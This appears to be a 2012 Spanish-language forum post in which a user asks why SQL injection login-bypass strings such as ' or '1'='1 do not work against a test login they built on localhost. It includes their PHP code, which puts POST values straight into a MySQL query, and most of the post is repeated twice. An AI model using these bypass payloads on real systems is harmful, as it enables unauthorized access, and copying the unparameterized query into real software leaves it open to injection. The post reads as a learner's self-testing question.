1
Hacking / Duda: filtrar usuario en un login?
« en: Julio 14, 2012, 08:38:12 pm »
Holas ,como puedo inyectar esto <or 1=1>, esto fue lo que hice leyendo algunos papers
user=' or '1'='1 o ' or '='
pass=' or '1'='1 o ' or '='
Tengo 2 archivos creados en localhost ,login.html y login.php la consulta es la siguente
$query=mysql_query("select id,name,password from users
where name='$_POST[user]' and password='$_POST[pass]'",$conexion)
or die("Problemas en el select:".mysql_error());
Cuando hago la consulta en la consola funciona perfecto,aqui les va
mysql>= select id,name,password from users where name='' or ''='' and password='' or ''='';
Espero que hayan entendido mi problema, y no me digan que esta mal hecho mi login, porque probe con datos verdaderos y funciona
user=' or '1'='1 o ' or '='
pass=' or '1'='1 o ' or '='
Tengo 2 archivos creados en localhost ,login.html y login.php la consulta es la siguente
$query=mysql_query("select id,name,password from users
where name='$_POST[user]' and password='$_POST[pass]'",$conexion)
or die("Problemas en el select:".mysql_error());
Cuando hago la consulta en la consola funciona perfecto,aqui les va
mysql>= select id,name,password from users where name='' or ''='' and password='' or ''='';
Espero que hayan entendido mi problema, y no me digan que esta mal hecho mi login, porque probe con datos verdaderos y funciona